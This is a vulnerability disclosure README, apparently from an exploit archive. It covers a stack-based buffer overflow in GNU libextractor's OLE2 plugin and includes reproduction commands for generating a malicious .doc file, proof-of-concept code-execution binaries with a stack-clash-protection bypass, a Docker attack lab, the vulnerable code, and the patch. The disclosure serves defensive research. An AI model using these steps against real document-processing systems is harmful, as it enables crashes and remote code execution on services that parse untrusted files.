Share
## https://sploitus.com/exploit?id=0235A98C-2CDE-5F3B-8090-524B0CE466C9
# Stack-Based Buffer Overflow in GNU libextractor โค 1.14 (OLE2 Plugin)
## Summary
A stack-based buffer overflow in GNU libextractor's OLE2 plugin allows **remote denial of service** (crash) and **code execution** when processing a crafted `.doc` file. The vulnerability is in `process_star_office()` (`ole2_extractor.c:349`) which allocates a Variable Length Array of up to 4MB on the stack based on attacker-controlled file data.
**Primary Impact:** Remote Denial of Service โ crashes any application processing the malicious file
**Secondary Impact:** Remote Code Execution via adjacent-thread-stack bypass of `-fstack-clash-protection`
| Field | Value |
|-------|-------|
| Severity | **HIGH** (DoS) / **CRITICAL** (RCE in multi-threaded in-process mode) |
| CWE | CWE-121 (Stack-based Buffer Overflow) |
| Attack Vector | Network (any file processing path) |
| Privileges Required | None |
| User Interaction | None |
| Affected Versions | All versions through 1.14 |
> **Note:** Modern GCC (โฅ8) enables `-fstack-clash-protection` by default, which on single-threaded applications converts the exploitable overflow into a safe crash. However, **this mitigation can be bypassed in multi-threaded applications** where thread stacks are adjacent in memory โ the VLA probes succeed into the neighbor thread's stack, enabling full code execution even on hardened builds. See [docs/BYPASS.md](docs/BYPASS.md) for details.
## Affected Software
- GNU libextractor โค 1.14 (all versions with OLE2 plugin)
- Any application using libextractor to process untrusted `.doc` files
- GNUnet (file sharing indexer)
## Quick Demo
```bash
# Generate malicious .doc
python3 poc/gen_payload.py exploit.doc
# Any application that processes this file with libextractor crashes:
extract exploit.doc # CLI tool โ OLE2 plugin worker crashes
gnunet-publish exploit.doc # GNUnet โ gnunet-helper-fs-publish crashes
```
## Proof of Concept (Lab Demo)

*The animation above demonstrates the automated lab environment provided in the `lab-setup/` directory. By simply running `docker compose up`, an attacker container automatically generates the malicious `.doc` payload and uploads it to a vulnerable Document Indexing web service. The `libextractor` parsing logic triggers the VLA stack overflow, allowing the attacker to silently achieve arbitrary code execution. We verify the exploit by running `cat /tmp/pwned` on the target container to see the command output.*
## Repository Structure
```
โโโ poc/ # Proof of concept
โ โโโ gen_payload.py # Generates malicious .doc trigger file
โ โโโ poc_rce.c # Demonstrates code execution (protection disabled)
โ โโโ bypass_rce.c # Stack-clash-protection bypass (multi-threaded)
โโโ exploit/ # Exploitation details
โ โโโ remote_exploit.sh # Example: triggering via HTTP upload (lab scenario)
โ โโโ extract_server.c # Example: vulnerable application using libextractor
โโโ patches/ # Recommended fix
โ โโโ 0001-fix-ole2-vla.patch
โโโ lab-setup/ # Reproducible test environment
โ โโโ Dockerfile # Builds vulnerable libextractor from source
โ โโโ docker-compose.yml # Full lab (includes HTTP upload as one test vector)
โ โโโ upload_server.py # Document indexing service simulation
โโโ docs/
โโโ BYPASS.md # Stack-clash-protection bypass technique
โโโ PAYLOAD_STRUCTURE.md # Malicious .doc file format documentation
```
## Reproduction
### Crash / DoS (works on any system)
```bash
# Build libextractor from source
./configure && make && sudo make install
# Generate trigger file
python3 poc/gen_payload.py exploit.doc
# Crash any libextractor consumer
extract exploit.doc # crashes the OLE2 plugin worker
```
### Code Execution (protection disabled)
```bash
gcc -O2 -fno-stack-clash-protection -o poc_rce poc/poc_rce.c -lextractor
ulimit -s 2048
./poc_rce exploit.doc # executes attacker payload (exit code 42)
```
### Code Execution (protection bypass, multi-threaded)
```bash
gcc -O2 -fstack-clash-protection -o bypass_rce poc/bypass_rce.c -lextractor -lpthread
./bypass_rce exploit.doc # bypasses protection, executes payload (exit code 42)
```
### Docker lab
```bash
docker-compose -f lab-setup/docker-compose.yml up -d
```
## Root Cause
```c
// src/plugins/ole2_extractor.c:349
off_t size = gsf_input_size(src); // Attacker controls via OLE2 stream
if (size > 4 * 1024 * 1024) return 0; // Max 4MB allowed โ but stack is 1-8MB
char buf[size]; // VLA: up to 4MB ON THE STACK
gsf_input_read(src, size, buf); // Write attacker data
```
Without `-fstack-clash-protection`, the compiler generates:
```asm
sub %rax, %rsp ; Single instruction, jumps RSP past guard page
```
With `-fstack-clash-protection`, the probes can still be bypassed in multi-threaded contexts (see [docs/BYPASS.md](docs/BYPASS.md)).
## Official Patch (libextractor 1.15)
```diff
- if ( (size 4 * 1024 * 1024) )
+ char buf[0x374];
+
+ if (size < 0x374)
return 0;
- {
- char buf[size];
- gsf_input_read (src, size, (unsigned char*) buf);
+ gsf_input_read (src, sizeof(buf), (unsigned char*) buf);
```
## Credit
Discovered by me (Haitam Lazaar) during my independent security research.
## License
My research is provided for educational and defensive purposes. Use responsibly.